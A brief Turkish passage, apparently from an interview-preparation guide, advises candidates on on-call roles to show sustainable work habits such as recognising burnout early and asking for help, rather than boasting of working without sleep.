  • Tükenmişliği erken fark edip yardım isterim
Kaçın: “Ben uykusuz da çalışırım” gibi sürdürülemez cevaplar. Mülakatçı giderek daha çok sağlıklı operasyon alışkanlığı arıyor.
On-call disipliniDevir planıÖncelik listesiYardım istemekSürdürülebilir çalışma